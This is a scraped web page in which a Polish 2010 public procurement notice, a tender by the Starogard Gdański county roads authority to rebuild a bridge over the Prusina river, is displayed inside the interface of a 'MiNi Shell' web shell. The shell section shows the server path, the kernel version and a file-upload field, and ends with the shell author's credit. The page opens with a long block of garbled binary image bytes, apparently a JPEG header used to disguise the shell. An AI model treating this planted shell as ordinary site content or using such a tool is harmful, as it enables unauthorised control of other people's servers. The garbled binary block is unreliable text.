JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100507/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100507/125876-N-2010.html

<p class="kh_header"><b>Starogard Gdański: Przebudowa mostu drogowego nad rzeką Prusina na drodze powiatowej   nr 2621G Osieczna-Skrzynia w miejscowości Osieczna</b><br>
<b>Numer ogłoszenia: 125876 - 2010; data zamieszczenia: 07.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg , ul. Mickiewicza 9, 83-200 Starogard Gdański, woj. pomorskie, tel. (058) 562-34-61, faks (058) 562-34-62.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdstg.alpha.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa mostu drogowego nad rzeką Prusina na drodze powiatowej   nr 2621G Osieczna-Skrzynia w miejscowości Osieczna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa mostu drogowego  nad rzeką Prusina na drodze powiatowej nr 2621G Osieczna-Skrzynia w miejscowości Osieczna. zakres zamówienia obejmuje:
1. Wyznaczenie trasy i punktów wysokościowych w terenie równinnym - th 1 wraz 
    z wytyczeniem obiektu i obsługą geodezyjną - Ryczałt 1;
2. Mechaniczne usunięcie warstwy ziemi urodzajnej /humusu/ grub. w-wy do 15 cm
    - 1360,9 m2;
3. Rozebranie nawierzchni z kostki kamiennej - 90,0 m2;
4. Rozebranie ogrodzeń z siatki z ponownym odtworzeniem i wykonaniem 
    tymczasowego zabezpieczenia na czas budowy przed wstępem ludzi i    
    zwierząt - 12,0 m;
5. Rozebranie ogrodzeń drewnianych z ponownym odtworzeniem i wykonanie  
    tymczasowego zabezpieczenia na czas budowy przed wstępem ludzi i zwierząt
    - 64,0 m;
6. Rozebranie tarcz (tablic) znaków drogowych z ponownym odtworzeniem           
    - 4,0 szt.;
7. Wykonanie ław fundamentowych w deskowaniu, beton kl. B-30 - z     
    zabezpieczeniem wykopu na lądzie - 12,1 m3;
8. Wykonanie wykopu otwartego bez zabezpieczeń - 342,4 m3;
9. Pompowanie wody z wykopu - na lądzie - 150,0 h;
10. Wykonanie rozbiórki podpory - na lądzie - 10,6 m3
11. Wykonanie ustroju rurowego z blachy falistej o powierzchni otworu od 3.6
     do 7.5 m2. Konstrukcja o grubości blachy 4,00 mm z zabezpieczeniem    
     epoksydowym - 52,5 m2;
12. Wykonanie zwięczenia ustroju tunelowego z betonu B-30 Wlot i wylot obiektu
      - 1,5 m3;
13. Wykonanie umocnienia wlotu brukiem z kamienia polnego Skarpy na wlocie i 
     wylocie obiektu - 157,0 m2;
14. Wykonanie wypełnienia przestrzeni miedzy istniejącą konstrukcją a
     ustrojem rurowym - beton B25 - 4,4 m2;
15. Wykonanie chodnika z betonu klasy B-30 pod kapami - 21,4 m3;
16. Wykonanie warstwy wyrównawczej (uszczelniającej) z betonu B-15 pod 
     kapami - 2,1 m3;
17. Osadzenie znaków wysokościowych. Repery na końcach kap i w środku ich  
     długości - 6,0 szt.;
18. Osadzenie kotew zamocowań barier itp. - 254,8 kg;
19. Wykonanie zbrojenia chodnika ze stali klasy A-IIIN - 1811,0 kg;
20. Wykonanie rozbiórki przęsła betonowego monolitycznego - nad lądem - 28,7 m3;
21. Wykonanie rozbiórki dźwigarów stalowych o konstrukcji blachownicowej -
     nad lądem. Dźwigary stalowe i balustrady wraz z odwozem na ustalone 
     składowisko - 1,5 t;
22. Koszt elementu studzienki. Wpust uliczny 500x500 ze zintegrowanym osadnikiem
     materiałów - 2,0 kg;
23. Koszt rur kolektora o średn. 300 mm. Kolektor od studzienek do ścieku 
     skarpowego średcy do 200 mm - 14,2 m;
24. Wykonanie powłokowej izolacji bitumicznej układanej na zimno -
     powierzchnie pionowe - 35,4 m2;
25. Wykonanie powłokowej izolacji bitumicznej układanej na zimno -powierzchnie 
     poziome oczepy - 8,7 m2;
26. Wykonanie izolacji z geowłókniny z geomembraną Parasol przeciw wodny nad 
     konstrukcją stalową - 95,7 m2;
27. Koszt stalowych barier ochronnych na dojazdach w rozsatwie co 2,0 m 
      - 16,0 m; 
28. Montaż bariery ochronnej jednostronnej o rozstawie słupków - 2.0 m na  
     dojazdach -16,0 m;
29. Montaż bariero-poręczy stalowych - sztywnych o rozstawie słupków 1,33 m  
     - 32,0 m;
30. Wytworzenie konstrukcji bariero-poręczy o rozstawie słupków 1,33 m0 
     barieroporęcze szczeblinkowe - 32,0 m;
31. Zabezpieczenie antykorozyjne konstrukcji bariero-poręczy poprzez
     metalizację. Bareiroporęcze szczeblinkowe - grubość powłoki do 0,2 mm
     - 123,3 m2;
32. Zakup krawężników z betonu klasy B-35 Na dojazdach - osadzenie w ławie z 
     oporem z chudego betonu B-15 - 43,5 m;
33. Ustawienie krawężników betonowych na podlewce betonowej modyf.
     polimerami na dojazadch - 43,5 m;
34. Wykonanie tymczasowego przełożenia kabli telekomunikacyjnych po stronie 
     wody dolnej -22,0 m;
35. Wykonanie zasypki przyczółka mieszanką cementowo piaskową - 37,5 m3;
36. Wykonanie zasypki piaskowo-żwirowej - 842,3 m3;
37. Ułożenie geotkaniny. Tkanina techniczna pod fundamentem kruszywowym  
     - 260,1 m2;
38. Wykonanie chodnika z kostki betonowej 8cm. Nawierzchnia jezdni na     
      dojazdach - 114,2 m2;
39. Ustawienie obrzeży betonowych. Nawierzchnia jezdni na dojazdach - 22,0 m;
40. Podsypka cementowo - piaskowa. Nawierzchnia jezdni na dojazdach - 
     stabilizacja 1:4 - 76,7 m3;
41. Podsypka piaskowa. Nawierzchnia jezdni na dojazdach - 80,2 m3;
42. Wykonanie podbudowy z kruszywa łamanego. Nawierzchnia jezdni na 
     dojazadach - warstwa odsączająca żwirowo-piaskowa - 83,7 m3;
43. Wykonanie umocnienia stoSków przyczółkowych matą polimerową, 
     humusowaniem i obsianiem trawą - 951,9 m2;
44. Palisada z pali drewnianych impregnowanych. Umocnienie wzdłuż koryta 
     podwójną kiszką faszynową - 70,0 m2;
45. Wykonanie umocnienia koryta rzeki narzutem kamiennym - 103,5 m3;
46. Wykopanie i zasypanie kanału obiegowego - 1666,8 m3;
47. Wykonanie i demontaż grodzy - ścianka szczelna - 192,0 m2;
48. Usypanie i likwidacja grobli ziemnych - 482,4 m3;
49. Wypompowanie wody z kanału w rejonie robót - rycz. 2,0;
50. Wykonanie ścieków skarpowych z betonowych elementów pref.-korytkowych
     - 11,1 m;
51. Wykonanie ścieków skarpowych z betonu kl.B-30, formowanych w miejscu 
     wbudowania - 0,1 m3;
52. Wykonanie nawierzchni z betonu asfaltowego modyf. - warstwa wiążąca grub. 
     5 cm - 85,3 m2;
53. Wykonanie nawierzchni z betonu asfaltowego modyf. - za każdy następny 1 cm 
     grubości warstwy wiążącej - 85,3 m2;
54. Wykonanie nawierzchni z betonu asfaltowego modyf. - warstwa ścieralna grub. 
     4 cm - 85,3 m2;
55. Wykonanie nawierzchni z betonu asfaltowego modyf. - za każdy następny 1 cm 
     grubości warstwy ścieralnej - 85,3 m2;
56. Wykonanie nawierzchni na chodniku z żywic syntetycznych o grub. 6 mm 
     - 42,8 m2;
57. Wykonanie kładki tymczasowej na palach z rur stalowych, dźwigarach z belek 
     walcowanych na kapach - 18,0 m2..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w oparciu o przepisy art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych do 50 % zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 32.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego zamówienia odpowiadającego swoim przedmiotem robotom budowlanym będącym przedmiotem niniejszego zamówienia, tzn. polegające na budowie, przebudowie lub remoncie mostu lub wiaduktu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie w celu realizacji zamówienia następującymi narzędziami i urządzeniami: Koparko-ładowarka, Koparka z osprzętem hydraulicznym lub linowym,  Walec statyczny samojezdny stalowy, Walec statyczny samojezdny ogumiony, Walec wibracyjny samojezdny, Rozkładarka mas bitumicznych, Lekki młot pneumatyczny, Piła mechaniczna, Samochód samowyładowczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie osobami, które będą uczestniczyć          w realizacji zamówienia, legitymującymi się doświadczenie i kwalifikacjami zawodowymi określonymi poniżej:
Kierownik budowy posiadający min 3 lata praktyki zawodowej jako kierownik podobnych   robót,   legitymujący   się   uprawnieniami budowlanymi (bez ograniczeń) do kierowania robotami w    specjalności    mostowej   oraz przynależność do Polskiej Izby Inżynierów Budownictwa lub dokumenty równoważne odpowiadające dyrektywom i umowom międzynarodowym.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym lub osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w  szczególności przedstawiając w tym celu:
1)	pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia, zawierające informację o doświadczeniu podmiotu oraz zakres robót, które te podmioty zobowiązują się wykonać - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów w zakresie realizacji części zamówienia,
2)	pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, zawierające także wykaz narzędzi i urządzeń technicznych, które ten podmiot zobowiązuje się udostępnić - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na potencjale technicznym innych podmiotów,
3)	pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienna listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonania zamówienia innych podmiotów.
Inne dokumenty:
- Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy.
8.4.3.	Pełnomocnictwo do podpisania oferty obejmujące także czynność potwierdzania za zgodność  z oryginałem dokumentów składających się na ofertę i składanych wraz z ofertą -o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdstg.alpha.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg ul. Mickiewicza 9, 83-200 Starogard Gdański.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2010 godzina 09:30, miejsce: Powiatowy Zarząd Dróg ul. Mickiewicza 9, 83-200 Starogard Gdański, pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com